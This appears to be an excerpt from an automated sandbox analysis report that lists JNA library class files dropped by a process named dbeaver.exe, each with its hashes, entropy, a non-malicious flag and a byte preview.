      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):654
      Entropy (8bit):4.990192010945811
      Encrypted:false
      SSDEEP:
      MD5:BB804756BBF3838AF7D9B7BC9E0DE052
      SHA1:2A2CDA8F7C8CBFDFF12B1E9C4353196A09BB4BF0
      SHA-256:08F92E873935F7EEEAC13CBA76709C1EEE52A48E9E2C04A093E2ECD9066F28DB
      SHA-512:87DF1514E737D14A454A8D7B64FF10DD5C362EA93C7899982085D97FA46F84C19B2EAD2EEB5322E8FADCA4214FF90F47EEC0164F299C8BFE16B33D3C5F46442A
      Malicious:false
      Reputation:unknown
      Preview:.......2.....................type...Ljava/lang/Class;...Signature...Ljava/lang/Class<*>;...<init>...(Ljava/lang/Class;)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/FromNativeContext;...javaType...LocalVariableTypeTable...(Ljava/lang/Class<*>;)V...getTargetType...()Ljava/lang/Class;...()Ljava/lang/Class<*>;...SourceFile...FromNativeContext.java.............com/sun/jna/FromNativeContext...java/lang/Object...()V.!.......................................X........*...*+.............................................................................................../........*..................."....................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):312
      Entropy (8bit):5.033530407194792
      Encrypted:false
      SSDEEP:
      MD5:C636FBF531935E46626FA13B14B4E67A
      SHA1:B6EBB6001BF841995631C5F357F7C85A2AEBFDAC
      SHA-256:0A585545BCA99BD2F213624204CCED97DDF20725CA756173C053676D35AB48E7
      SHA-512:3D4A8C22B1A20A6ACF9308A7B5B8EAF62F2C74B8140AEA1A3C16E9B5B70BDD922FA4B3E30E656F1FF1C2A8A0C604A6F6EC118B68634AD4A2F312EA20CDB41C82
      Malicious:false
      Reputation:unknown
      Preview:.......2...........fromNative..E(Ljava/lang/Object;Lcom/sun/jna/FromNativeContext;)Ljava/lang/Object;...nativeType...()Ljava/lang/Class;...Signature...()Ljava/lang/Class<*>;...SourceFile...FromNativeConverter.java...com/sun/jna/FromNativeConverter...java/lang/Object..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):993
      Entropy (8bit):5.35245831973038
      Encrypted:false
      SSDEEP:
      MD5:A8AE6CA74F868B0F89EBA4CDB46CDC41
      SHA1:A5F20C83F10455A5914E7E9A5E3392E6F53C1446
      SHA-256:6D8709D9973D94603BC779003604FE5E9C5A1E69A82BCE5430667F3E83F4C910
      SHA-512:D77F1EA14CDF1E0DEED6DC12D661B3A74DFAF7230CB5AA0A304C180B2423B09644771567F583B9132863BB1C540538C461A8A7F5928945B52BB9288D394B685F
      Malicious:false
      Reputation:unknown
      Preview:.......2.3........................ ....!..#..$..%...original...[Lcom/sun/jna/NativeMapped;...<init>...([Lcom/sun/jna/NativeMapped;)V...Code...LineNumberTable...LocalVariableTable...this...NativeMappedArray...InnerClasses..(Lcom/sun/jna/Function$NativeMappedArray;...arg...read...()V...SourceFile...Function.java..'..(.)..*..+.,....-........./..0.1..2..&com/sun/jna/Function$NativeMappedArray...com/sun/jna/Memory..!com/sun/jna/Function$PostCallRead...PostCallRead...java/lang/Object...getClass...()Ljava/lang/Class;...com/sun/jna/Native...getNativeSize..&(Ljava/lang/Class;Ljava/lang/Object;)I...(J)V...setValue..'(JLjava/lang/Object;Ljava/lang/Class;)V...getValue..8(JLjava/lang/Class;Ljava/lang/Object;)Ljava/lang/Object;...com/sun/jna/Function. .................................c.......#*+...+.......*+...*.*...*.........................*...+...,.".-...........#.........#...................@........*.*......*......W................0...1.......................................".......".&..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):908
      Entropy (8bit):5.4095425503219055
      Encrypted:false
      SSDEEP:
      MD5:5434CFB42096B558A64CB4AC67B71962
      SHA1:D3FF78B2EEE28F6FE1A067A136FDAA0808967F02
      SHA-256:5E3A579A36A0EB732483D9556E56D182D7D5578B28385297B9CDCB2E19FAB367
      SHA-512:8F81EA2D4909B74CB0EF990028A5703CF1EC0E73067EAA5DD1E28AF2426B7924B5DB3A11B0A2D22E99A78C8D82ECF959880855B85B949732477C3BDA58EC31AB
      Malicious:false
      Reputation:unknown
      Preview:.......2.0......... ....!...."....#..%..&..'...original...[Lcom/sun/jna/Pointer;...<init>...([Lcom/sun/jna/Pointer;)V...Code...LineNumberTable...LocalVariableTable...i...I...this...PointerArray...InnerClasses..#Lcom/sun/jna/Function$PointerArray;...arg...StackMapTable..%......read...()V...SourceFile...Function.java..)..*......+.......,.-......./..!com/sun/jna/Function$PointerArray...com/sun/jna/Memory..!com/sun/jna/Function$PostCallRead...PostCallRead...com/sun/jna/Native...POINTER_SIZE...(J)V...setPointer...(JLcom/sun/jna/Pointer;)V...(J[Lcom/sun/jna/Pointer;II)V...com/sun/jna/Function. .........................................:*...+..`h....*+....=.+....*....h.+.2.........*...+.h.....................7...8...9...:.'.9.-.<.9.=..... ...............:.........:............................................>........*.*....*.......................@...A.......................................$.......$.(..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):215
      Entropy (8bit):4.845415325595294
      Encrypted:false
      SSDEEP:
      MD5:530F36736A54EBC25B97C2AED345B556
      SHA1:18A7EFDFF21E54EFDE8F4279DE326E5ADEE5CB41
      SHA-256:CE4A5C85E64D9F48C0A727C33345D0BD21DAF560166FF59889E27E4BAE8265FA
      SHA-512:11049F58EA79AED4D7699C5D5383F9E8B3E458F02E78AB6A90B035F8606AEFCF899F136F7C79F330C2E2EB30064EB9035AA5CD72F573D9FE0C4DA1F56760DF84
      Malicious:false
      Reputation:unknown
      Preview:.......2...........read...()V...SourceFile...Function.java.....!com/sun/jna/Function$PostCallRead...PostCallRead...InnerClasses...java/lang/Object...com/sun/jna/Function..............................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):19867
      Entropy (8bit):6.00202166372298
      Encrypted:false
      SSDEEP:
      MD5:A108CF3952254D393D5C5F2E5219561D
      SHA1:A057D0286D98523BB7A902AF02F49C4E5A4AA275
      SHA-256:DEC6AA3358EF23C3B5793AAE939D6D8D50AE75747201DA2565439A1F1F625D56
      SHA-512:4EF9C9F2F009757059DAD897CA57BDA74BF5555111B3B8321C35E6C166630B3A5B3FE88B85D966CB053992344245C222D085BD91CA824C117C371D12ED146720
      Malicious:false
      Reputation:unknown
      Preview:.......2................................w......................................................................................................w.......w...................."....................)..................-..................X.......X..........................................3.................B.......D...............G.......J..........,..../.......L....G....G....U............X.................\.......\...._......._....b.......b....e.......e....h............h....l............l....p............p...............u............G.........G....G............N..w....P..w....`..w............................................w....3...................... ....!..G."....#..$....G.%....&..'....(....%..,......)....*..+....,....-..L..../..0....1..2..3..4..5..6..7..8..G.9..:..G.;....<..=....>..?.......@..A....B....C..w.D..w.E..F..G.......H..h.I..J..e.K..h.L..l.M..p.N.........O..w.O.....$....X.P..$.Q...PointerArray...InnerClasses...NativeMappedArray...PostCallRead...MAX_NARGS...I...ConstantValue.......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):223
      Entropy (8bit):4.967044343838658
      Encrypted:false
      SSDEEP:
      MD5:982773DDD8740F16CD75C66BA2393B7F
      SHA1:E64580635AD50628B9BD396BB8A6959ACAD8AA34
      SHA-256:7BB511543F22EB0CACFC32E9F4FEB39414862DA19BA4CB821A13C7C185A90498
      SHA-512:5F596FFD2E642B553EC8924EBBCD00B3C43E62069C5F11409129C17B7ADB944818E2C8CB5A30DD717B4A012504E912B0D19571BEBC3A19B683D57FD30361F91D
      Malicious:false
      Reputation:unknown
      Preview:.......2...........getFunctionName..I(Lcom/sun/jna/NativeLibrary;Ljava/lang/reflect/Method;)Ljava/lang/String;...SourceFile...FunctionMapper.java...com/sun/jna/FunctionMapper...java/lang/Object..............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):866
      Entropy (8bit):4.885425215580112
      Encrypted:false
      SSDEEP:
      MD5:C3F9054E3104396F5C8CC7A3205B1EC3
      SHA1:025B4471F7F3063F25B465AD0FE9BBF730016E6C
      SHA-256:64365CD093AB157251C2E5B7934FF4C362240E90B1FE37D21E3504ECDC9ECE9F
      SHA-512:8CBE886CC2C069D0E6E2010113F22B5F3E98F77D0E2C80E7E133AE60C9945D8042D471A12905E15FCE6A50653E0AB462A0CF8212BB95DC6D5AFB2F1A6163BE47
      Malicious:false
      Reputation:unknown
      Preview:.......2.$................... ..!.."...function...Lcom/sun/jna/Function;...args...[Ljava/lang/Object;...index...I...<init>..-(Lcom/sun/jna/Function;[Ljava/lang/Object;I)V...Code...LineNumberTable...LocalVariableTable...this..&Lcom/sun/jna/FunctionParameterContext;...f...getFunction...()Lcom/sun/jna/Function;...getParameters...()[Ljava/lang/Object;...getParameterIndex...()I...SourceFile...FunctionParameterContext.java....#.................$com/sun/jna/FunctionParameterContext...com/sun/jna/ToNativeContext...()V.!...............................................l........*...*+...*,...*....................!..."...#...$...%.....*......................................................./........*...................'.............................../........*...................).............................../........*...................*............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):949
      Entropy (8bit):5.039297678989447
      Encrypted:false
      SSDEEP:
      MD5:A5D7A149F97ACE9247265D328D7DB5C9
      SHA1:C52D9044D70ABC5CAEDF63E137D5741BB4FEBE8C
      SHA-256:BA4CD94D676A28FD021A36FEC8E034B5741833662D1FDBE28548B0953BDD72A8
      SHA-512:A4015EA3B0C8DB96606AF0DDA274ED3CB71AE49350DD1803246ADDB90578CF37064D3304E14818057AED1C8643B893230D9BBB4750099352BD6C735BC8002820
      Malicious:false
      Reputation:unknown
      Preview:.......2.#................. ..!...function...Lcom/sun/jna/Function;...args...[Ljava/lang/Object;...<init>..=(Ljava/lang/Class;Lcom/sun/jna/Function;[Ljava/lang/Object;)V...Code...LineNumberTable...LocalVariableTable...this..#Lcom/sun/jna/FunctionResultContext;...resultClass...Ljava/lang/Class;...LocalVariableTypeTable...Ljava/lang/Class<*>;...Signature..@(Ljava/lang/Class<*>;Lcom/sun/jna/Function;[Ljava/lang/Object;)V...getFunction...()Lcom/sun/jna/Function;...getArguments...()[Ljava/lang/Object;...SourceFile...FunctionResultContext.java...."............!com/sun/jna/FunctionResultContext...com/sun/jna/FromNativeContext...(Ljava/lang/Class;)V.!.......................................v........*+...*,...*-................... ...!..."...#.....*................................................................................./........*...................'.............................../........*...................,............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):4078
      Entropy (8bit):5.295352072326908
      Encrypted:false
      SSDEEP:
      MD5:155C4A5810768025E204BADC84678827
      SHA1:EF4E5712DF1B84A472CFE5A552AB394CF3235F7A
      SHA-256:9419DA5687D607669B0DD064082D5073F808536DB16F450354DC666ABE24F5D9
      SHA-512:9D70050A8F5F43E97B4BE74111EFDA600DF63094D92B6E4C3C0D93F24BB9057FD04483DDD0BF1A34FB42AF739BCAD4DE57D869288398F64FE28E244B0B292C57
      Malicious:false
      Reputation:unknown
      Preview:.......2....$.m.. .n..$.o..$.p..$.q..$.r...........s.t..$.u...........v.w...........x.y..z.{..|..}....n..~..................................z............. ................. .... ...................$....$........serialVersionUID...J...ConstantValue............size...I...number...Ljava/lang/Number;...unsigned...Z...value...<init>...(I)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/IntegerType;...(IZ)V...(IJ)V...(IJZ)V...setValue...(J)V...mask...truncated...StackMapTable...toNative...()Ljava/lang/Object;...fromNative..E(Ljava/lang/Object;Lcom/sun/jna/FromNativeContext;)Ljava/lang/Object;...nativeValue...Ljava/lang/Object;...context...Lcom/sun/jna/FromNativeContext;...nativeType...()Ljava/lang/Class;...Signature...()Ljava/lang/Class<*>;...intValue...()I...longValue...()J...floatValue...()F...doubleValue...()D...equals...(Ljava/lang/Object;)Z...rhs...toString...()Ljava/lang/String;...hashCode...compare..5(Lcom/sun/jna/IntegerType;Lcom/sun/jna/IntegerType;)I...v1...v2.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):251
      Entropy (8bit):4.941009306445287
      Encrypted:false
      SSDEEP:
      MD5:A049AD6598DDC656ACA5459E1F9BCBA5
      SHA1:865574F3294332E23AE348200EF783827472DC3F
      SHA-256:B9D5AE7CAAE5F55F03C80C5EC5519C568F239EFA32D06F5B2122E40B80056D02
      SHA-512:CBA639E110E0A3653FA6713E6F05D26633E0AE8EA8B5C0C43A428F11287B99F948A4425D876C57B6B2E2AD5A40168D65E9EA15D3B10A21C636CBF8538FF6B961
      Malicious:false
      Reputation:unknown
      Preview:.......2...........getInvocationHandler..\(Lcom/sun/jna/NativeLibrary;Ljava/lang/reflect/Method;)Ljava/lang/reflect/InvocationHandler;...SourceFile...InvocationMapper.java...com/sun/jna/InvocationMapper...java/lang/Object..............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):360
      Entropy (8bit):4.808918014540916
      Encrypted:false
      SSDEEP:
      MD5:0DFF4C5DB9737A701182742F073841D3
      SHA1:CF0455365D8BA07F2B577AC0DF48799A5AE30838
      SHA-256:1AA2349D3483835CEEAF4C32A7041828F5DE6B2FD2984145B59E1F2F6BE0452A
      SHA-512:7C049E487721FDC5668CF65B43648AB1FFCF7CC12B87DC31BC6A46505D7E7BB2F621B56D3039FAF943DF3CE9B6D70A99AE17910426D3805984CF791B77402A90
      Malicious:false
      Reputation:unknown
      Preview:.......2..........................CURRENT...Lcom/sun/jna/JNIEnv;...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...<clinit>...SourceFile...JNIEnv.java........com/sun/jna/JNIEnv........java/lang/Object.1.............................../........*...................!...............................#...........Y.................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2249
      Entropy (8bit):5.540795886302989
      Encrypted:false
      SSDEEP:
      MD5:07750B947371C85E2D6623EB3096E5CB
      SHA1:7663F14131BB6772B149362DBFA4324AC0891C8D
      SHA-256:4A2029BD9F97C1D7BD2FC8CC2764F6F444641E9B35FBF1938A57980294B763FE
      SHA-512:F14DD11A2F16992076C889C4180B6078A5B0CA2071A36A2D559D0C39E32AAA9D6C8E6A1135FD62627571760D5770AC5A6027D74E59E3971E289074C61C3E1D7B
      Malicious:false
      Reputation:unknown
      Preview:.......2.Z....8..9....:..;..<.=..>..?....8..@....A....B..C....D..E....F..G..H..I..J....K..L..M...<init>...()V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/Klass;...newInstance..%(Ljava/lang/Class;)Ljava/lang/Object;...msg...Ljava/lang/String;...e.."Ljava/lang/IllegalAccessException;..$Ljava/lang/IllegalArgumentException;.."Ljava/lang/InstantiationException;..!Ljava/lang/NoSuchMethodException;...Ljava/lang/SecurityException;..-Ljava/lang/reflect/InvocationTargetException;...klass...Ljava/lang/Class;...LocalVariableTypeTable...Ljava/lang/Class<TT;>;...StackMapTable..>..E..G..H..I..J...Signature..1<T:Ljava/lang/Object;>(Ljava/lang/Class<TT;>;)TT;...SourceFile...Klass.java........java/lang/Class..N.O...java/lang/Object..P....Q.. java/lang/IllegalAccessException...java/lang/StringBuilder...Can't create an instance of ..R.S..R.T..(, requires a public no-arg constructor: ..U.V.."java/lang/IllegalArgumentException....W.. java/lang/InstantiationException...java/lang/NoSuc
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1865
      Entropy (8bit):5.278395356241347
      Encrypted:false
      SSDEEP:
      MD5:6BBE9FFC0E9E254FAB9487B6479D8593
      SHA1:3318E6BA8D66BA47BF376E0CED4577DD11DD6846
      SHA-256:7C6E6246D4700AF04221A8681EF93F850E1CA85009DAC15169F6E15E42E13D7B
      SHA-512:8098ACC1C864E151B2BC4A87AF5749C45B1955B66C28A56F7EEF509F38560280867232D72B91C71DF32FF4A9AB28B48C99D866E17CE489A2CF18B437EB41861C
      Malicious:false
      Reputation:unknown
      Preview:.......2.g..:.;..<....=..>....?....@....A..B..C.D....E..F....G..H.I....J....K..L..H.M..N..H.O..H.P....Q..R..S...serialVersionUID...J...ConstantValue............errorCode...I...formatMessage...(I)Ljava/lang/String;...Code...LineNumberTable...LocalVariableTable...code...StackMapTable..T...parseMessage..&(Ljava/lang/String;)Ljava/lang/String;...e..!Ljava/lang/NumberFormatException;...m...Ljava/lang/String;..F...getErrorCode...()I...this.. Lcom/sun/jna/LastErrorException;...<init>...(Ljava/lang/String;)V...msg..R...(I)V...(ILjava/lang/String;)V...SourceFile...LastErrorException.java..U..V.W...java/lang/StringBuilder..2.X...GetLastError() returned ..Y.Z..Y.[..\.]...errno was ..^.._.`.... ...java/lang/NumberFormatException.......T..a.]..'.(..2.3...[..b.c...]..d.`..e.f..2.7...com/sun/jna/LastErrorException...java/lang/RuntimeException...java/lang/String...com/sun/jna/Platform...isWindows...()Z...()V...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;...(I)Ljava/lang/StringBuilder;...toSt
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1388
      Entropy (8bit):5.29770105154079
      Encrypted:false
      SSDEEP:
      MD5:AF77B99CEC61C4641A6E5AE1BB9E29F7
      SHA1:B6E0B5219B8B108BCCDA17656A6715F929BF340B
      SHA-256:FF4B4009B1E943B1E98407FD9E370F9338A35668550A2281AFBA20957ADCB5DE
      SHA-512:DDE9AC129048A3B9234552D730D44FBCAB88C1DB9A34FDCD987F8F6C81CFD4D8896DC8F31780723503C2495C13A1D72DECE2389249B5E3F7159B0C8868D720E4
      Malicious:false
      Reputation:unknown
      Preview:.......2.7....*....+....,....-........./....0..1..2...handler..%Ljava/lang/reflect/InvocationHandler;...function...Lcom/sun/jna/Function;...isVarArgs...Z...methodHandle...Ljava/lang/Object;...options...Ljava/util/Map;...Signature..$Ljava/util/Map<Ljava/lang/String;*>;...parameterTypes...[Ljava/lang/Class;...[Ljava/lang/Class<*>;...<init>...(Ljava/lang/Object;)V...Code...LineNumberTable...LocalVariableTable...this..4...Handler...InnerClasses...FunctionInfo..*Lcom/sun/jna/Library$Handler$FunctionInfo;...mh..`(Ljava/lang/reflect/InvocationHandler;Lcom/sun/jna/Function;[Ljava/lang/Class;ZLjava/util/Map;)V...LocalVariableTypeTable..x(Ljava/lang/reflect/InvocationHandler;Lcom/sun/jna/Function;[Ljava/lang/Class<*>;ZLjava/util/Map<Ljava/lang/String;*>;)V...SourceFile...Library.java....5................................(com/sun/jna/Library$Handler$FunctionInfo...java/lang/Object..6...com/sun/jna/Library$Handler...()V...com/sun/jna/Library.0........................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):6380
      Entropy (8bit):5.810066637301106
      Encrypted:false
      SSDEEP:
      MD5:EC939E81688121EE544B2C40EEB5EE69
      SHA1:2499527561B16D6BA3A207451CC068745803C29A
      SHA-256:C43416AA047492B7DF22280070F6D1271211D2EA8FFC7337C04064D663E374D2
      SHA-512:97DDC74A985AFEE326B03D5360BAA0C8376785EBA19478FE0968EE7319C058085E9B72D0C70E6C74B6A33D1CA7754326F62BD0C6734F494709625B99F95D025E
      Malicious:false
      Reputation:unknown
      Preview:.......2.7.....I............S.................................................K.......K....S............S.......K............................K.........S..........S.........S.................S....I....S....I.....................................$......................3.........3....3.........3.........3....T....3....3.........3..................K...................P...........Handler...InnerClasses...FunctionInfo...OBJECT_TOSTRING...Ljava/lang/reflect/Method;...OBJECT_HASHCODE...OBJECT_EQUALS...nativeLibrary...Lcom/sun/jna/NativeLibrary;...interfaceClass...Ljava/lang/Class;...Signature...Ljava/lang/Class<*>;...options...Ljava/util/Map;..5Ljava/util/Map<Ljava/lang/String;Ljava/lang/Object;>;...invocationMapper...Lcom/sun/jna/InvocationMapper;...functions..ULjava/util/Map<Ljava/lang/reflect/Method;Lcom/sun/jna/Library$Handler$FunctionInfo;>;...<init>..5(Ljava/lang/String;Ljava/lang/Class;Ljava/util/Map;)V...Code...LineNumberTable...LocalVariableTable...this...Lcom/sun/jna/Library$Handler;.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):826
      Entropy (8bit):5.387045904621796
      Encrypted:false
      SSDEEP:
      MD5:83E65DB528996C3120872645C817708F
      SHA1:3720B7D44B0D6332880500DF454F6CD2B4724F16
      SHA-256:C68BA441334A4C3A228B26EB164B7831F30B8DA1D9799078EF6A6EE2797CBCE9
      SHA-512:4EA42EF874C081F0F5701B38D705ED14F42A4409681B307F45B372271E4DFD63BE6EF7EC4F207D451EE0D8233CAA0DF00886E08CFA98C1E1D8125D8175393F1C
      Malicious:false
      Reputation:unknown
      Preview:.......2.+........ ...Handler...InnerClasses...OPTION_TYPE_MAPPER...Ljava/lang/String;...ConstantValue..!...OPTION_FUNCTION_MAPPER.."...OPTION_INVOCATION_MAPPER..#...OPTION_STRUCTURE_ALIGNMENT..$...OPTION_STRING_ENCODING..%...OPTION_ALLOW_OBJECTS..&...OPTION_CALLING_CONVENTION..'...OPTION_OPEN_FLAGS..(...OPTION_CLASSLOADER..)...OPTION_SYMBOL_PROVIDER..*...SourceFile...Library.java...com/sun/jna/Library...java/lang/Object...com/sun/jna/Library$Handler...type-mapper...function-mapper...invocation-mapper...structure-alignment...string-encoding...allow-objects...calling-convention...open-flags...classloader...symbol-provider......................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):863
      Entropy (8bit):5.3084289259100865
      Encrypted:false
      SSDEEP:
      MD5:152001D47AD9621FBA37454D2CF46457
      SHA1:0252A417775057890423E4B729C47B5C30F8C9EA
      SHA-256:0F0F3459F244F1A3E644AEBCD77D592588E1F5F7AE4ADFC81F683A608FB803A4
      SHA-512:FEC25D6904CAE84D5E2634A41A48996E44DA2B2FD3E7AE86A53D1FCEFF974437716D6A6DE01773913D171472F6E481AC3813020F7B99128C5F617217243F61DE
      Malicious:false
      Reputation:unknown
      Preview:.......2.2...................... .!..".#..$..%..&...peer...J...<init>...(J)V...Code...LineNumberTable...LocalVariableTable...this...MemoryDisposer...InnerClasses..#Lcom/sun/jna/Memory$MemoryDisposer;...run...()V...StackMapTable..'...SourceFile...Memory.java............(..)....*.+..,..-..../..0.1..!com/sun/jna/Memory$MemoryDisposer...java/lang/Object...java/lang/Runnable...java/lang/Throwable...com/sun/jna/Memory...free...access$000...()Ljava/util/Map;...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/util/Map...remove..&(Ljava/lang/Object;)Ljava/lang/Object;.0.................................F........*...*..........................................................!...................8*.........*...........W*.......L...*...........W*....+...................".......................0...5...7.............8.............._..............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1017
      Entropy (8bit):5.140674319669508
      Encrypted:false
      SSDEEP:
      MD5:A3738920919EB4E3ECC4DD847ED6305E
      SHA1:0B89CA8D70D8E5FC25C03C74F06583B45DA777D5
      SHA-256:53F248D3733A67DDE19474E41A4AE4EE52AC18460360837B18C076FF7F8986C7
      SHA-512:937B9337C440C4019800117413D9692DAA03638F2826128F67EE5BDD51ABDD0D20B3949C358D4A21AB5F109C193662D02BC42F0D0700AF36115A6284581F3030
      Malicious:false
      Reputation:unknown
      Preview:.......2.7....(....)....*....+....+....,..-....)........./..0..1.......2..3...this$0...Lcom/sun/jna/Memory;...<init>...(Lcom/sun/jna/Memory;JJ)V...Code...LineNumberTable...LocalVariableTable...this...SharedMemory...InnerClasses..!Lcom/sun/jna/Memory$SharedMemory;...offset...J...size...dispose...()V...boundsCheck...(JJ)V...off...sz...toString...()Ljava/lang/String;...SourceFile...Memory.java.................4.... .!...java/lang/StringBuilder..$.%..5.6... (shared from ...)...com/sun/jna/Memory$SharedMemory...com/sun/jna/Memory...peer...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;. ...............................d........*+...*...*.....*+... a...................W...X...Y...Z..... .................................$...........4........*....................^..._..................... .!.......Y........*...*...*......e.a!...................c...d..... .................".........#.......$.%.......P.......&...Y...*...........*.................................g...........&.........&.....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):11046
      Entropy (8bit):5.349106520843366
      Encrypted:false
      SSDEEP:
      MD5:CFFDD5422DA0175BFD7B677549FF6C6E
      SHA1:A442DDEBFE85683A6C11F4E5060841E69C81D013
      SHA-256:FA5960F8FD5A073EB2B1B876AA703F74EF982D767D82B1C45B0F7971DD18947C
      SHA-512:040DCC9202FB00EA0424B536F73553BF79111951F77EB4300F36AD2741B662200441A26F20E98F9944442C911DF8DCEE800DAED461EB1CE5AAC9753685D1089C
      Malicious:false
      Reputation:unknown
      Preview:.......2..............u................................................w...... ..!.."....#....$....%..&..'.......(....)....*..+....,....#..-..../....0....1..2.3..4..#.5..2.6....7....8....9....:..;..*.<..=....>...........?..@.........A..B..C..4.#..D..E..w.F...........w.G..H.I..w.J...........w.K...........w.L..w.M..w.N..H.O..w.P..w.Q..w.R..w.S..w.T..w.U..w.V..w.W..w.X..w.Y..w.Z..w.[..w.\..w.]..w.^..w._..w.`....a..w.b..u.c..w.d..w.e..w.f..w.g..w.h..w.i..w.j..w.k..w.l..w.m..H.n..w.o..p.q..w.r..s..-.t..u..v..H.w..H.$....x..w.%....y..z..s....{..u....|..}...MemoryDisposer...InnerClasses...SharedMemory...allocatedMemory...Ljava/util/Map;...Signature..PLjava/util/Map<Ljava/lang/Long;Ljava/lang/ref/Reference<Lcom/sun/jna/Memory;>;>;...buffers...Lcom/sun/jna/WeakMemoryHolder;...cleanable..~...Cleanable..(Lcom/sun/jna/internal/Cleaner$Cleanable;...size...J...purge...()V...Code...LineNumberTable...disposeAll...LocalVariableTable...m...Lcom/sun/jna/Memory;...r...Ljava/lang/ref/Reference;...refs...Lj
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):742
      Entropy (8bit):5.091164152821284
      Encrypted:false
      SSDEEP:
      MD5:9E3856CBC58F39D6290E3B976367AF65
      SHA1:5E62347C5D93745AB5DCD15D52017E5F47795D07
      SHA-256:E1A8399C6F05C96BCB8A0760196E98C438D5B1B8A7E9F40EB8CF01FF23CEB3B0
      SHA-512:5F5EA3E21388A91C675C43661A364128851216F688994478004C1C45A6618381C76229B9F7F8FD32FEC3B79721B19B7E7E8BD573A45F09425DDB0BF1A99A4231
      Malicious:false
      Reputation:unknown
      Preview:.......2.....................method...Ljava/lang/reflect/Method;...<init>..G(Lcom/sun/jna/Function;[Ljava/lang/Object;ILjava/lang/reflect/Method;)V...Code...LineNumberTable...LocalVariableTable...this..$Lcom/sun/jna/MethodParameterContext;...f...Lcom/sun/jna/Function;...args...[Ljava/lang/Object;...index...I...m...getMethod...()Ljava/lang/reflect/Method;...SourceFile...MethodParameterContext.java............"com/sun/jna/MethodParameterContext..$com/sun/jna/FunctionParameterContext..-(Lcom/sun/jna/Function;[Ljava/lang/Object;I)V.!...............................h........*+,....*.....................!..."...#.....4................................................................./........*...................%............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):966
      Entropy (8bit):5.1523458748884705
      Encrypted:false
      SSDEEP:
      MD5:FA02B4E4E7B350278A34230E81BFE3E7
      SHA1:C62A423E3800CC2A34F6C7AEC21D12F165F8BCB1
      SHA-256:41E0DFE3EF1C228FB4AA96E12B6F093DEDFEF848354832B8DCD944A467ED4797
      SHA-512:8216FD5DAA0B9D8FBBB6177210690BD230D2ECDD23CA4AE62AD3FF51BCD75902507CC0B7EA689B45722EA160C2AA4E901690604411EDEABAE92BFB58CE3B5A56
      Malicious:false
      Reputation:unknown
      Preview:.......2.!...................method...Ljava/lang/reflect/Method;...<init>..W(Ljava/lang/Class;Lcom/sun/jna/Function;[Ljava/lang/Object;Ljava/lang/reflect/Method;)V...Code...LineNumberTable...LocalVariableTable...this..!Lcom/sun/jna/MethodResultContext;...resultClass...Ljava/lang/Class;...function...Lcom/sun/jna/Function;...args...[Ljava/lang/Object;...LocalVariableTypeTable...Ljava/lang/Class<*>;...Signature..Z(Ljava/lang/Class<*>;Lcom/sun/jna/Function;[Ljava/lang/Object;Ljava/lang/reflect/Method;)V...getMethod...()Ljava/lang/reflect/Method;...SourceFile...MethodResultContext.java.... ........com/sun/jna/MethodResultContext..!com/sun/jna/FunctionResultContext..=(Ljava/lang/Class;Lcom/sun/jna/Function;[Ljava/lang/Object;)V.!...............................z........*+,-...*.....................#...$...%.....4.........................................................................................../........*...................)............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
